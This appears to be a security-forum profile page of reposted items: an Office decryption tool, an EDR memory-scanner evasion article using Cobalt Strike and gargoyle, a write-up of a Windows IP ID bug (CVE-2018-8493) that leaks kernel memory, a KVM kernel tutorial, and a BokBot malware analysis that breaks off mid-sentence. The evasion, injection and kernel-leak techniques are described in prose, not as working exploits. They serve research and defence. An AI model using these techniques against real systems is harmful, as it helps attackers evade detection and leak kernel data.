-
Posts
18794 -
Joined
-
Last visited
-
Days Won
742
Everything posted by Nytro
-
SymDiff Diff tool for comparing symbols in PDB files https://github.com/WalkingCat/SymDiff
-
msoffcrypto-tool msoffcrypto-tool (formerly ms-offcrypto-tool) is a Python tool and library for decrypting encrypted MS Office files with password, intermediate key, or private key which generated its escrow key. Early PoC version: https://github.com/nolze/ms-offcrypto-tool/tree/v0.1.0 Install pip install msoffcrypto-tool Examples As CLI tool (with password) msoffcrypto-tool -p Passw0rd encrypted.docx decrypted.docx Test if the file is encrypted or not (exit code 0 or 1 is returned): msoffcrypto-tool --test -v document.doc As library Password and more key types are supported with library functions. import msoffcrypto file = msoffcrypto.OfficeFile(open("encrypted.docx", "rb")) # Use password file.load_key(password="Passw0rd") # Use private key # file.load_key(private_key=open("priv.pem", "rb")) # Use intermediate key (secretKey) # file.load_key(secret_key=binascii.unhexlify("AE8C36E68B4BB9EA46E5544A5FDB6693875B2FDE1507CBC65C8BCF99E25C2562")) file.decrypt(open("decrypted.docx", "wb")) Supported encryption methods MS-OFFCRYPTO specs ECMA-376 (Agile Encryption/Standard Encryption) MS-DOCX (OOXML) (Word 2007-2016) MS-XLSX (OOXML) (Excel 2007-2016) MS-PPTX (OOXML) (PowerPoint 2007-2016) Office Binary Document RC4 CryptoAPI MS-DOC (Word 2002, 2003, 2004) MS-XLS (Excel 2002, 2003, 2004) (experimental) MS-PPT (PowerPoint 2002, 2003, 2004) Office Binary Document RC4 MS-DOC (Word 97, 98, 2000) MS-XLS (Excel 97, 98, 2000) (experimental) MS-PPT (PowerPoint 97, 98, 2000) ECMA-376 (Extensible Encryption) XOR Obfuscation Other Word 95 Encryption (Word 95 and prior) Excel 95 Encryption (Excel 95 and prior) PowerPoint 95 Encryption (PowerPoint 95 and prior) PRs welcome! Todo Add tests Support decryption with passwords Support older encryption schemes Add function-level tests Add API documents Publish to PyPI Add decryption tests for various file formats Merge to more comprehensive projects handling MS Office files (such as oletools?) if possible Support decrypting encrypted macros Support decrypting encrypted Excel worksheets Support decrypting editing protection Support encryption Sursa: https://github.com/nolze/msoffcrypto-tool
-
Bypassing Memory Scanners with Cobalt Strike and Gargoyle William Burgess, 18 July 2018 This blog post will present research into attempting to bypass memory scanners using Cobalt Strike’s beacon payload and the gargoyle memory scanning evasion technique. It will demonstrate a proof of concept (PoC) which uses gargoyle to stage a Cobalt Strike beacon payload on a timer. The assumption behind this PoC is that we will be up against Endpoint Detection and Response solutions (EDRs) using memory scanning techniques which occur at regular time intervals and that do not alert on non-executable memory (as this is likely to be extremely noisy and performance intensive at scale). By ‘jumping’ in and out of memory we aim to avoid having our payload resident in memory when a scanner runs and then re-stage it into memory when the coast is clear. This post assumes some familiarity with the gargoyle memory scanning evasion technique and Matt Graeber’s technique for writing optimized Windows shellcode in C. Introduction Modern enterprises are increasingly adopting sophisticated endpoint detection and response solutions (EDRs) which specialise in detecting advanced malware at scale across an enterprise. Examples of these include Carbon Black, Crowdstrike’s Falcon, ENDGAME, CyberReason, Countercept, Cylance and FireEye HX.[1] One of the challenges MWR face when conducting targeted attack simulations is that we will frequently obtain a foothold on a host which is running some type of EDR solution. As a result, it is vital that we are able to bypass any advanced detection capabilities in place to remain hidden. Many EDR solutions feature powerful capabilities that can be effective at detecting suspicious behaviour on a compromised host, such as: Memory scanning techniques, such as looking for reflectively loaded DLLs, injected threads [2] and inline/IAT/EAT hooking [3] Real-time system tracing, such as process execution, file writes and registry activity Command line logging and analysis Network tracing Common cross-process access techniques such as monitoring for CreateRemoteThread, WriteProcessMemory and VirtualAllocEx Articol complet: https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/
-
EXPLOITING WINDOWS’ IP ID RANDOMIZATION BUG TO LEAK KERNEL DATA AND MORE (CVE-2018-8493) October 30, 2018 Ran Menscher IP fragmentation is an ancient mechanism that nevertheless yields surprising attacks in modern days, due to its complexity. This post explains CVE-2018-8493, an interesting vulnerability that I’ve recently found and was patched in the latest Patch Tuesday. INTRODUCTION The IP protocol suite supports fragmentation in order to transport packets longer than a link’s MTU. The design relies on an identification field (“IP ID”), such that all fragments that belong to the same packet will have the same IP ID. example of a fragmented IPv6 packet, IP ID is shown as “ident” in the packet’s summary (Ipv4 only uses a 15 bit Identification field, whereas Ipv6 uses 31 bits which appears on an IPv6 optional header) In 2003 it was shown that this design was vulnerable, as (in a naïve implementation, a global counter) an attacker could blindly intercept or discard packets. Later, more mature demonstrations surfaced (i.e this one). Before that, predicting this identification field allowed attackers to scan networks without disclosing the compromised node (“idle scan”). An excerpt from this master thesis shows the state of the art (2013) with major OSs’ implementations for the assignment method of IP ID: algorithm used to generate IP IDs in various OSs. as tested by Mathias Morbitzer in 2013 Notice how Windows and non-BSD Linux are marked “Global” for a global counter. Not too great… SO THEY SOLVED IT! Around that time Microsoft started generating the IP ID randomly, uniquely per IP-PATH (=src,dst tuple). They chosen the Toeplitz hash for this task (with a random 40 bytes key). Why? Because they were implementing Receive-Side-Scaling as hinted by the “Rss” prefix on the used functions. While mixing performance and security is not always the best idea, this design could in principle still be safe… but we’ll see. IMPLEMENTATION IP ID is calculated in the following way: identification = base + increment base is calculated at the IP path allocation (first packet sent to a new remote address). The logic is: base = IpFragmentIdSecretTable ^ RssHashComputeToeplitzHash(protocol_family, SourceAddress, RemoteAddress); IpFragmentIdSecretTable is a random DWORD generated on system start. RssHashComputeToeplitzHash is calling RtlComputeToeplitzHash on the {SrcIP,DstIP} tuple and increment is a dword out of an 0x8000 bytes long table called IpFragmentIdIncrementTable, increment = IpFragmentIdIncrementTable[RssHashComputeToeplitzStreamHash(...) ^ IpFragmentIdSecretTableHighWord) & 0x1FFF] CVE-2018-8493 ExAllocatePoolWithTag is called to allocate 0x8000 bytes. while BCryptGenRandom initializes only 8 bytes (the rest are left with previous data from the kernel’s usage) The vulnerability lies in the fact that IpFragmentIdIncrementTable is not initialized with random content. It used to be (as it is in 6.2.9200.16399, from 2012), but in current latest windows 10 and 8.1 versions only 8 of its 0x8000 bytes are initialized. The rest are uninitialized, non-zeroed kernel memory, as received from ExAllocatePoolWithTagPriority. Because of this reason, it is very likely that the increment value for an IP-path is zero, the attacker has many attempts to “hit” zero table entries, and can simply rank candidates for the key, choosing the highest ranking. Using two samples of an identification field that were generated for different IP paths, and whose increment value is zero – it is possible to calculate a DWORD out of the key that is used for hashing, IpRssToeplitzHashKey. RtlComputeToeplitzHash’s logic is: int RtlComputeToeplitzHash(…){ result = 0; do { result ^= matrices[2*offset+1][*input & 0xF] ^ matrices[2*offset][*input>>4]; offset += 2; input++; } while ( remaining_bytes-- ); return result; } Essentially, each nibble from the input is used as an offset to a 4*4 Toeplitz matrix, the matrices are generated from the IpRssToeplitzHashKey. Taking a DWORD and a fifth byte each time, and taking a 32 bit “window” of the two with a specific bit offset (here I referred to the windowing as “rol”) A Toeplitz matrix is simply a list of cells, each holds a mix of key bits (32 bits at a time), rolled a various number of times, and XORed between them. an example to give the impression of it: 0 rol(key,3) rol(key,2) rol(key,3) ⊕ rol(key,2) rol(key,1) rol(key,3) ⊕ rol(key,1) rol(key,2) ⊕ rol(key,1) rol(key,3) ⊕ rol(key,2) ⊕ rol(key,1) rol(key,0) rol(key,3) ⊕ rol(key,0) rol(key,2) ⊕ rol(key,0) rol(key,3) ⊕ rol(key,2) ⊕ rol(key,0) rol(key,1) ⊕ rol(key,0) rol(key,3) ⊕ rol(key,1) ⊕ rol(key,0) rol(key,2) ⊕ rol(key,1) ⊕ rol(key,0) rol(key,3) ⊕ rol(key,2) ⊕ rol(key,1) ⊕ rol(key,0) Important observations I had about this matrix and algorithm: The different cells contain different numbers of XOR’d elements. The hash state evolves by XORing itself with a new value If we take two inputs that are identical besides their last element (= last nibble), The hashing state for the two would be identical until the latest iteration, where it will evolve like this: (i’ve taken 1 and 9 as the latest nibbles for the two samples) Result1 ^= rol(key,3) Result2 ^= rol(key,3) ^ rol(key,0) In this case, Result1 ^ Result2 gives rol(key,0), which is simply key. This is apparently true to any pair of nibbles that are a XOR of 8 from the other (Toeplitz matrix characteristics) And depending on the offset of the non identical nibbles – different parts of the key are uncovered. PUTTING IT ALL TOGETHER Two IP ID samples for which the IpFragmentIdIncrementTable cell is zero. (you don’t know this, but get enough samples, do the whole process and a clear winner will emerge) Therefore Identification = secret_dword ^ hash(ip_path) The IP-Paths are identical but two nibbles, which are XOR 8 of each other Therefore Hash1 ^ hash2 = key And lastly, (because the secret_dword XORs itself out) Sample1 ^ Sample2 = key This can be continued to get all the other key parts. READING UNINITIALIZED KERNEL MEMORY Since XORing two IP ID samples (with table values zero) yields a key part, which we know – With one sample and a key part – we can calculate an expected IP ID for other IP Paths, if the table content for them was zero. And comparing to an actual sample of the IP ID for that IP Path, if it’s greater than the expected value, the difference must be the cell content, Kernel data! The results of a crude PoC: Output of a simple PoC to read 8 bytes of the key (above), and use those to read uninitialized data (below) SUMMARY OF THE ATTACK Generate/Acquire as many pairs of samples of fragmented IP packets sent on different IP paths The pairs must have the paths identical but one nibble, where the two samples would hold a values of XOR 8 from each other. XOR the IP IDs rank the outcomes. the one with most occurrences is a DWORD from the key. keep the IP IDs and IP PATHs that gave the correct outcome use those against other IP PATHs, where the relation is not a XOR of 8. Calculate the expected result (now that you have the key) the difference between the actual result and the expected is uninitialized kernel memory. break KASLR. (For the advanced students: add logic that adjusts the outcomes to the fact that the IP IDs are only read in windows of 31 bits) FINAL WORDS a special thanks goes to @tom41sh from MSRC and the wise @ace__pace Sursa: https://menschers.com/2018/10/30/what-is-cve-2018-8493/
-
[Note] Learning KVM - implement your own Linux kernel Few weeks ago I solved a great KVM escaping challenge from TWCTF hosted by @TokyoWesterns. I have given a writeup on my blog: [Write-up] TokyoWesterns CTF 2018 - pwn240+300+300 EscapeMe, but it mentions nothing about KVM because there's no bug (at least I didn't find) around it. Most introduction of KVM I found are actually introducing either libvirt or qemu, lack of how to utilize KVM by hand, that's why I have this post. This thread is a good start to implement a simple KVM program. Some projects such as kvm-hello-world and kvmtool are worthy to take a look as well. And OSDev.org has great resources to learn system architecture knowledge. In this post I will introduce how to use KVM directly and how it works, wish this article can be a quick start for beginners learning KVM. I've created a public repository for the source code of KVM-based hypervisor and the kernel: david942j/kvm-kernel-example. You can clone and try it after reading this article. Warning: all code in this post may be simplified to clearly show its function, if you want to write some code, I highly recommend you read examples in the repository instead of copy-paste code from here. The kernel I implemented is able to execute an ELF in user-space, this is the screenshot of execution result: Introduction KVM (Kernel-base Virtual Machine) is a virtual machine that implemented native in Linux kernel. As you know, VM usually used for creating a separated and independent environment. As the official site described, each virtual machine created by KVM has private virtualized hardware: a network card, disk, graphics adapter, etc. First I'll introduce how to use KVM to execute simple assembled code, and then describe some key points to implement a Linux kernel. The Linux kernel we will implement is extremely simple, but more features might be added after this post released. Get Started All communication with KVM is done by the ioctl syscall, which is usually used for getting and setting device status. Creating a KVM-based VM basically needs 7 steps: Open the KVM device, kvmfd=open("/dev/kvm", O_RDWR|O_CLOEXEC) Do create a VM, vmfd=ioctl(kvmfd, KVM_CREATE_VM, 0) Set up memory for VM guest, ioctl(vmfd, KVM_SET_USER_MEMORY_REGION, ®ion) Create a virtual CPU for the VM, vcpufd=ioctl(vmfd, KVM_CREATE_VCPU, 0) Set up memory for the vCPU vcpu_size=ioctl(kvmfd, KVM_GET_VCPU_MMAP_SIZE, NULL) run=(struct kvm_run*)mmap(NULL, mmap_size, PROT_READ|PROT_WRITE, MAP_SHARED, vcpufd, 0) Put assembled code on user memory region, set up vCPU's registers such as rip Run and handle exit reason. while(1) { ioctl(vcpufd, KVM_RUN, 0); ... } Too complicated!? See this figure A VM needs user memory region and virtual CPU(s), so all we need is to create VM, set up user memory region, create vCPU(s) and its working space then execute it! Code is better than plaintext for hackers. Warning: code posted here has no error handling. Step 1 - 3, set up a new VM /* step 1~3, create VM and set up user memory region */ void kvm(uint8_t code[], size_t code_len) { // step 1, open /dev/kvm int kvmfd = open("/dev/kvm", O_RDWR|O_CLOEXEC); if(kvmfd == -1) errx(1, "failed to open /dev/kvm"); // step 2, create VM int vmfd = ioctl(kvmfd, KVM_CREATE_VM, 0); // step 3, set up user memory region size_t mem_size = 0x40000000; // size of user memory you want to assign void *mem = mmap(0, mem_size, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0); int user_entry = 0x0; memcpy((void*)((size_t)mem + user_entry), code, code_len); struct kvm_userspace_memory_region region = { .slot = 0, .flags = 0, .guest_phys_addr = 0, .memory_size = mem_size, .userspace_addr = (size_t)mem }; ioctl(vmfd, KVM_SET_USER_MEMORY_REGION, ®ion); /* end of step 3 */ // not finished ... } In above code fragment I assign 1GB memory (mem_size) to the guest, and put assembled code on the first page. Later we will set the instruction pointer to 0x0 (user_entry), where the guest should start to execute. Step 4 - 6, set up a new vCPU /* step 4~6, create and set up vCPU */ void kvm(uint8_t code[], size_t code_len) { /* ... step 1~3 omitted */ // step 4, create vCPU int vcpufd = ioctl(vmfd, KVM_CREATE_VCPU, 0); // step 5, set up memory for vCPU size_t vcpu_mmap_size = ioctl(kvmfd, KVM_GET_VCPU_MMAP_SIZE, NULL); struct kvm_run* run = (struct kvm_run*) mmap(0, vcpu_mmap_size, PROT_READ | PROT_WRITE, MAP_SHARED, vcpufd, 0); // step 6, set up vCPU's registers /* standard registers include general-purpose registers and flags */ struct kvm_regs regs; ioctl(vcpufd, KVM_GET_REGS, ®s); regs.rip = user_entry; regs.rsp = 0x200000; // stack address regs.rflags = 0x2; // in x86 the 0x2 bit should always be set ioctl(vcpufd, KVM_SET_REGS, ®s); // set registers /* special registers include segment registers */ struct kvm_sregs sregs; ioctl(vcpufd, KVM_GET_SREGS, &sregs); sregs.cs.base = sregs.cs.selector = 0; // let base of code segment equal to zero ioctl(vcpufd, KVM_SET_SREGS, &sregs); // not finished ... } Here we create a vCPU and set up its registers include standard registers and "special" registers. Each kvm_run structure corresponds to one vCPU, and we will use it to get the CPU status after execution. Notice that we can create multiple vCPUs under one VM, then with multithread we can emulate a VM with multiple CPUs. Note: by default, the vCPU runs in real mode, which only executes 16-bit assembled code. To run 32 or 64-bit, the page table must be set up, which we'll describe later. Step 7, execute! /* last step, run it! */ void kvm(uint8_t code[], size_t code_len) { /* ... step 1~6 omitted */ // step 7, execute vm and handle exit reason while (1) { ioctl(vcpufd, KVM_RUN, NULL); switch (run->exit_reason) { case KVM_EXIT_HLT: fputs("KVM_EXIT_HLT", stderr); return 0; case KVM_EXIT_IO: /* TODO: check port and direction here */ putchar(*(((char *)run) + run->io.data_offset)); break; case KVM_EXIT_FAIL_ENTRY: errx(1, "KVM_EXIT_FAIL_ENTRY: hardware_entry_failure_reason = 0x%llx", run->fail_entry.hardware_entry_failure_reason); case KVM_EXIT_INTERNAL_ERROR: errx(1, "KVM_EXIT_INTERNAL_ERROR: suberror = 0x%x", run->internal.suberror); case KVM_EXIT_SHUTDOWN: errx(1, "KVM_EXIT_SHUTDOWN"); default: errx(1, "Unhandled reason: %d", run->exit_reason); } } } Typically we only care about the first two cases, KVM_EXIT_HLT and KVM_EXIT_IO. With instruction hlt, the KVM_EXIT_HLT is triggered. Instructions in and out trigger KVM_EXIT_IO. And not only for I/O, we can also use this as hypercall, i.e. to communicate with the host. Here we only print one character sent to device. ioctl(vcpufd, KVM_RUN, NULL) will run until an exit-like instruction occurred (such as hlt, out, or an error). You can also enable the single-step mode (not demonstrated here), then it will stop on every instructions. Let's try our first KVM-based VM: int main() { /* .code16 mov al, 0x61 mov dx, 0x217 out dx, al mov al, 10 out dx, al hlt */ uint8_t code[] = "\xB0\x61\xBA\x17\x02\xEE\xB0\n\xEE\xF4"; kvm(code, sizeof(code)); } And the execution result is: $ ./kvm a KVM_EXIT_HLT 64-bit World To execute 64-bit assembled code, we need to set vCPU into long mode. And this wiki page describes how to switch from real mode to long mode, I highly recommend you read it as well. The most complicated part of switching into long mode is to set up the page tables for mapping virtual address into physical address. x86-64 processor uses a memory management feature named PAE (Physical Address Extension), contains of four kinds of tables: PML4T, PDPT, PDT, and PT. The way these tables work is that each entry in the PML4T points to a PDPT, each entry in a PDPT to a PDT and each entry in a PDT to a PT. Each entry in a PT then points to the physical address. source: https://commons.wikimedia.org The figure above is called 4K paging. There's another paging method named 2M paging, with the PT (page table) removed. In this method the PDT entries point to physical address. The control registers (cr*) are used for setting paging attributes. For example, cr3 should point to physical address of pml4. More information about control registers can be found in wikipedia. This code set up the tables, using the 2M paging. /* Maps: 0 ~ 0x200000 -> 0 ~ 0x200000 */ void setup_page_tables(void *mem, struct kvm_sregs *sregs){ uint64_t pml4_addr = 0x1000; uint64_t *pml4 = (void *)(mem + pml4_addr); uint64_t pdpt_addr = 0x2000; uint64_t *pdpt = (void *)(mem + pdpt_addr); uint64_t pd_addr = 0x3000; uint64_t *pd = (void *)(mem + pd_addr); pml4[0] = 3 | pdpt_addr; // PDE64_PRESENT | PDE64_RW | pdpt_addr pdpt[0] = 3 | pd_addr; // PDE64_PRESENT | PDE64_RW | pd_addr pd[0] = 3 | 0x80; // PDE64_PRESENT | PDE64_RW | PDE64_PS sregs->cr3 = pml4_addr; sregs->cr4 = 1 << 5; // CR4_PAE; sregs->cr4 |= 0x600; // CR4_OSFXSR | CR4_OSXMMEXCPT; /* enable SSE instruction */ sregs->cr0 = 0x80050033; // CR0_PE | CR0_MP | CR0_ET | CR0_NE | CR0_WP | CR0_AM | CR0_PG sregs->efer = 0x500; // EFER_LME | EFER_LMA } There're some control bits record in the tables, include if the page is mapped, is writable, and can be accessed in user-mode. e.g. 3 (PDE64_PRESENT|PDE64_RW) stands for the memory is mapped and writable, and 0x80 (PDE64_PS) stands for it's 2M paging instead of 4K. As a result, these page tables can map address below 0x200000 to itself (i.e. virtual address equals to physical address). Remaining is setting segment registers: void setup_segment_registers(struct kvm_sregs *sregs) { struct kvm_segment seg = { .base = 0, .limit = 0xffffffff, .selector = 1 << 3, .present = 1, .type = 11, /* execute, read, accessed */ .dpl = 0, /* privilege level 0 */ .db = 0, .s = 1, .l = 1, .g = 1, }; sregs->cs = seg; seg.type = 3; /* read/write, accessed */ seg.selector = 2 << 3; sregs->ds = sregs->es = sregs->fs = sregs->gs = sregs->ss = seg; } We only need to modify VM setup in step 6 to support 64-bit instructions, change code from sregs.cs.base = sregs.cs.selector = 0; // let base of code segment equal to zero to setup_page_tables(mem, &sregs); setup_segment_registers(&sregs); Now we can execute 64-bit assembled code. int main() { /* movabs rax, 0x0a33323144434241 push 8 pop rcx mov edx, 0x217 OUT: out dx, al shr rax, 8 loop OUT hlt */ uint8_t code[] = "H\xB8\x41\x42\x43\x44\x31\x32\x33\nj\bY\xBA\x17\x02\x00\x00\xEEH\xC1\xE8\b\xE2\xF9\xF4"; kvm(code, sizeof(code)); } And the execution result is: $ ./kvm64 ABCD123 KVM_EXIT_HLT The source code of hypervisor can be found in the repository/hypervisor. So far you are already able to run x86-64 assembled code under KVM, so our introduction to KVM is almost finished (except handling hypercalls). In the next section I will describe how to implement a simple kernel, which contains some OS knowledge. If you are interesting in how kernel works, go ahead. Kernel Before implementing a kernel, some questions need to be dealt with: How CPU distinguishes between kernel-mode and user-mode? How could CPU transfer control to kernel when user invokes syscall? How kernel switches between kernel and user? kernel-mode v.s. user-mode An important difference between kernel-mode and user-mode is some instructions can only be executed under kernel-mode, such as hlt and wrmsr. The two modes are distinguish by the dpl (descriptor privilege level) field in segment register cs. dpl=3 in cs for user-mode, and zero for kernel-mode (not sure if this "level" equivalent to so-called ring3 and ring0). In real mode kernel should handle the segment registers carefully, while in x86-64, instructions syscall and sysret will properly set segment registers automatically, so we don't need to maintain segment registers manually. And another difference is the permission setting in page tables. In the above example I set all entries as non-user-accessible: pml4[0] = 3 | pdpt_addr; // PDE64_PRESENT | PDE64_RW | pdpt_addr pdpt[0] = 3 | pd_addr; // PDE64_PRESENT | PDE64_RW | pd_addr pd[0] = 3 | 0x80; // PDE64_PRESENT | PDE64_RW | PDE64_PS If kernel wants to create virtual memory for user-space, such as handling mmap syscall from user, the page tables must set the 3rd bit, i.e. have bit (1 << 2) set, then the page can be accessed in user-space. For example, pml4[0] = 7 | pdpt_addr; // PDE64_USER | PDE64_PRESENT | PDE64_RW | pdpt_addr pdpt[0] = 7 | pd_addr; // PDE64_USER | PDE64_PRESENT | PDE64_RW | pd_addr pd[0] = 7 | 0x80; // PDE64_USER | PDE64_PRESENT | PDE64_RW | PDE64_PS This is just an example, we should NOT set user-accessible pages in hypervisor, user-accessible pages should be handled by our kernel. Syscall There's a special register can enable syscall/sysenter instruction: EFER (Extended Feature Enable Register). We have used it for entering long mode before: sregs->efer = 0x500; // EFER_LME | EFER_LMA LME and LMA stand for Long Mode Enable and Long Mode Active, respectively. To enable syscall as well, we should do sregs->efer |= 0x1; // EFER_SCE We also need to register syscall handler so that CPU knows where to jump when user invokes syscalls. And of course, this registration should be done in kernel instead of hypervisor. Registration of syscall handler can be achieved via setting special registers named MSR (Model Specific Registers). We can get/set MSR in hypervisor through ioctl on vcpufd, or in kernel using instructions rdmsr and wrmsr. To register a syscall handler: lea rdi, [rip+syscall_handler] call set_handler syscall_handler: // handle syscalls! set_handler: mov eax, edi mov rdx, rdi shr rdx, 32 /* input of msr is edx:eax */ mov ecx, 0xc0000082 /* MSR_LSTAR, Long Syscall TARget */ wrmsr ret The magic number 0xc0000082 is the index for MSR, you can find the definitions in Linux source code. After setup, we can invoke syscall instruction and the program will jump to the handler we registered. syscall instruction not only changes rip, but also sets rcx as return address so that kernel knows where to go back after handling syscall, and sets r11 as rflags. It will change two segment registers cs and ss as well, which we will describe in the next section. Switching between kernel and user We also need to register the cs's selector for both kernel and user, via the register MSR we have used before. Here and here describe what does syscall and sysret do in details, respectively. From the pseudo code of sysret you can see it sets attributes of cs and ss explicitly: CS.Selector ← IA32_STAR[63:48]+16; CS.Selector ← CS.Selector OR 3; /* RPL forced to 3 */ /* Set rest of CS to a fixed value */ CS.Base ← 0; /* Flat segment */ CS.Limit ← FFFFFH; /* With 4-KByte granularity, implies a 4-GByte limit */ CS.Type ← 11; /* Execute/read code, accessed */ CS.S ← 1; CS.DPL ← 3; CS.P ← 1; CS.L ← 1; CS.G ← 1; /* 4-KByte granularity */ CPL ← 3; SS.Selector ← (IA32_STAR[63:48]+8) OR 3; /* RPL forced to 3 */ /* Set rest of SS to a fixed value */ SS.Base ← 0; /* Flat segment */ SS.Limit ← FFFFFH; /* With 4-KByte granularity, implies a 4-GByte limit */ SS.Type ← 3; /* Read/write data, accessed */ SS.S ← 1; SS.DPL ← 3; SS.P ← 1; SS.B ← 1; /* 32-bit stack segment*/ SS.G ← 1; /* 4-KByte granularity */ We have to register the value of cs for both kernel and user through MSR: xor rax, rax mov rdx, 0x00200008 mov ecx, 0xc0000081 /* MSR_STAR */ wrmsr The last is set flags mask: mov eax, 0x3f7fd5 xor rdx, rdx mov ecx, 0xc0000084 /* MSR_SYSCALL_MASK */ wrmsr The mask is important, when syscall instruction is invoked, CPU will do: rcx = rip; r11 = rflags; rflags &= ~SYSCALL_MASK; If the mask is not set properly, kernel will inherit the rflags set in user mode, which can cause severely security issues. The full code of registration is: register_syscall: xor rax, rax mov rdx, 0x00200008 mov ecx, 0xc0000081 /* MSR_STAR */ wrmsr mov eax, 0x3f7fd5 xor rdx, rdx mov ecx, 0xc0000084 /* MSR_SYSCALL_MASK */ wrmsr lea rdi, [rip + syscall_handler] mov eax, edi mov rdx, rdi shr rdx, 32 mov ecx, 0xc0000082 /* MSR_LSTAR */ wrmsr Then we can safely use the syscall instruction in user-mode. Now let's implement the syscall_handler: .globl syscall_handler, kernel_stack .extern do_handle_syscall .intel_syntax noprefix kernel_stack: .quad 0 /* initialize it before the first time switching into user-mode */ user_stack: .quad 0 syscall_handler: mov [rip + user_stack], rsp mov rsp, [rip + kernel_stack] /* save non-callee-saved registers */ push rdi push rsi push rdx push rcx push r8 push r9 push r10 push r11 /* the forth argument */ mov rcx, r10 call do_handle_syscall pop r11 pop r10 pop r9 pop r8 pop rcx pop rdx pop rsi pop rdi mov rsp, [rip + user_stack] .byte 0x48 /* REX.W prefix, to indicate sysret is a 64-bit instruction */ sysret Notice that we have to properly push-and-pop not callee-saved registers. The syscall/sysret will not modify the stack pointer rsp, so we have to handle it manually. Hypercall Sometimes our kernel needs to communicate with the hypervisor, this can be done in many ways, in my kernel I use the out/in instructions for hypercalls. We have used the out instruction to simply print a byte to stdout, now we extend it to do more fun things. An in/out instruction contains two arguments, 16-bit dx and 32-bit eax. I use the value of dx for indicating what kind of hypercalls is intended to call, and eax as its argument. I defined these hypercalls: #define HP_NR_MARK 0x8000 #define NR_HP_open (HP_NR_MARK | 0) #define NR_HP_read (HP_NR_MARK | 1) #define NR_HP_write (HP_NR_MARK | 2) #define NR_HP_close (HP_NR_MARK | 3) #define NR_HP_lseek (HP_NR_MARK | 4) #define NR_HP_exit (HP_NR_MARK | 5) #define NR_HP_panic (HP_NR_MARK | 0x7fff) Then modify the hypervisor to not only print bytes when encountering KVM_EXIT_IO: while (1) { ioctl(vm->vcpufd, KVM_RUN, NULL); switch (vm->run->exit_reason) { /* other cases omitted */ case KVM_EXIT_IO: // putchar(*(((char *)vm->run) + vm->run->io.data_offset)); if(vm->run->io.port & HP_NR_MARK) { switch(vm->run->io.port) { case NR_HP_open: hp_handle_open(vm); break; /* other cases omitted */ default: errx(1, "Invalid hypercall"); } else errx(1, "Unhandled I/O port: 0x%x", vm->run->io.port); break; } } Take open as example, I implemented the handler of open hypercall in hypervisor as: (warning: this code lacks security checks? /* hypervisor/hypercall.c */ static void hp_handle_open(VM *vm) { static int ret = 0; if(vm->run->io.direction == KVM_EXIT_IO_OUT) { // out instruction uint32_t offset = *(uint32_t*)((uint8_t*)vm->run + vm->run->io.data_offset); const char *filename = (char*) vm->mem + offset; MAY_INIT_FD_MAP(); // initialize fd_map if it's not initialized int min_fd; for(min_fd = 0; min_fd <= MAX_FD; min_fd++) if(fd_map[min_fd].opening == 0) break; if(min_fd > MAX_FD) ret = -ENFILE; else { int fd = open(filename, O_RDONLY, 0); if(fd < 0) ret = -errno; else { fd_map[min_fd].real_fd = fd; fd_map[min_fd].opening = 1; ret = min_fd; } } } else { // in instruction *(uint32_t*)((uint8_t*)vm->run + vm->run->io.data_offset) = ret; } } In kernel we invoke the open hypercall with: /* kernel/hypercalls/hp_open.c */ int hp_open(uint32_t filename_paddr) { int ret = 0; asm( "mov dx, %[port];" /* hypercall number */ "mov eax, %[data];" "out dx, eax;" /* trigger hypervisor to handle the hypercall */ "in eax, dx;" /* get return value of the hypercall */ "mov %[ret], eax;" : [ret] "=r"(ret) : [port] "r"(NR_HP_open), [data] "r"(filename_paddr) : "rax", "rdx" ); return ret; } Almost done Now you should know all things to implement a simple Linux kernel running under KVM. Some details are worthy to be mentioned during the implementation. execve My kernel is able to execute a simple ELF, to do this you will need knowledge with structure of ELF, which is too complicated to introduce here. You can refer to the source code of Linux for details: linux/fs/binfmt_elf.c#load_elf_binary. memory allocator You will need malloc/free for kernel, try to implement a memory allocator by yourself! paging Kernel has to handle the mmap request from user mode, so you will need to modify the page tables during runtime. Be care of NOT mixing kernel-only addresses with user-accessible addresses. permission checking All arguments passed from user-mode most be carefully checked. I've implemented checking methods in kernel/mm/uaccess.c. Without properly checking, user-mode may be able to do arbitrary read/write on kernel-space, which is a severe security issue. Conclusion This post introduces how to implement a KVM-based hypervisor and a simple Linux kernel, wish it can help you know about KVM and Linux more clearly. I know I've omitted many details here, especially for the kernel part. Since this post is intended to be an introduction of KVM, I think this arrangement is appropriate. If you have any questions or find bugs in my code, leave comments here or file an issue on github. If this post is helpful to you, I'll be very grateful to see 'thanks' on twitter @david942j Sursa: https://david942j.blogspot.com/2018/10/note-learning-kvm-implement-your-own.html
-
- 1
-
-
Digging into BokBot’s Core Module January 3, 2019 Shaun Hurley and James Scalise From The Front Lines Introduction BokBot first started showing up in 2017, and Crowdstrike’s Falcon® Overwatch™ and Falcon® Intelligence™ teams have analyzed these infections to ensure customers are both protected and informed. Recently, BokBot infections have become more prevalent due to Emotet campaigns that leverage BokBot as a means to go after a victim’s personal banking information. Given that BokBot is associated with the eCrime group MUMMY SPIDER, it is no surprise that the malware provides robust functionality, such as: Command and control of a system Process execution Registry editing Write to the file system Logging Polymorphism and other obfuscations TamperProofing Modular Credential theft Intercepting proxy Remote control via VNC In addition, BokBot has been seen downloading and executing binary code from other malware families: for example, the Azorult infostealer. This blog post will dig into the technical details of BokBot’s main module. Subsequent blog posts will cover the additional downloaded modules. BokBot Container Execution BokBot comes packed inside a crypter. The crypter goes through several stages before finally unpacking the BokBot binary and injecting it into svchost.exe. Here is a quick rundown of the different stages: Stage 1 (crypter) Decode stage 2 and execute Stage 2 (crypter) Decodes shellcode and execute Stage 3 (shellcode) Hollows out the base process image Decodes the core process injection PE Overwrites the base process image with the core process injection PE Stage 4 (process injection) Executes the process injection code Launches svchost.exe child process Injects BokBot as a headless PE image into the child process All of the behaviors relevant to the CrowdStrike® Falcon platform occur in stage 4. The primary focus for the following section is the unique method in which BokBot is injected into the child process. Process Injection In order to bypass antivirus (AV) detections for process hollowing, BokBot hooks several Windows API functions, executes the hooking code, and then removes the hook. Simulating Process Hollowing In order to simulate process hollowing, the ZwCreateUserProcess routine is hooked. BokBot calls ZwProtectVirtualMemory to modify the permissions of the routine to PAGE_READWRITE. Next, the first five opcodes (bytes) are replaced with the opcodes for a JMP <address of hooking code> instruction. Permissions are restored, and then CreateProcessA is called. Figure 1: Hooking ZwCreateUserProcess Once CreateProcessA is called, a function call chain leads to calling ZwCreateUserProcess and then the hooking code, as shown in Figure 1. At this point, no process has been created. The hooking code will complete the creation of the 